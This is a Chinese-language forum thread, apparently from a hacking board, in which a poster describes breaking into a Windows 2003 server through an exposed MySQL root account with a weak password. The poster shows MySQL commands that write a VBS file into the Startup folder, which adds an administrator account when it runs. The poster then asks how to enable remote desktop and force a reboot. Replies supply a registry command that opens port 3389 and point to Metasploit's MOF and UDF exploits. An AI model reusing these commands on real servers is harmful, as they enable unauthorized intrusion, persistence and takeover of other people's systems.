80端口只有Apache web server 页面不知道网站路径。
 
win 03的主机
mysql version:4.0.13-nt
是root权限
apache 版本:apache httpd 2.0.48
3306端口开了外连.并且是弱口令,已经知道了帐号/密码
开的端口有 135.445.1026.80.256.3306
 
mysql>insert into a values (“set wshshell=createobject (“”wscript.shell”" ) ” );
mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user 1 1/add”",0) ” );
mysql>insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup Administrators 1 /add”",0) ” );
mysql>select * from a into outfile “c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs”;
目前已经写进了启动项
有两个问题：问一下开3389的命令？
如何让对方重启？
 
2000和03都可以用 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f  命令来开3389
你为何不直接用MSF打，直接系统权限
求姿势。对msf半知半解
是生成的payload 转换成16进制 然后在放启动项里吗？
 
msf>search mysql…………………….
 
里面有mof和udf的exploit
 
你既然连上mysql了也可以手工mof或udf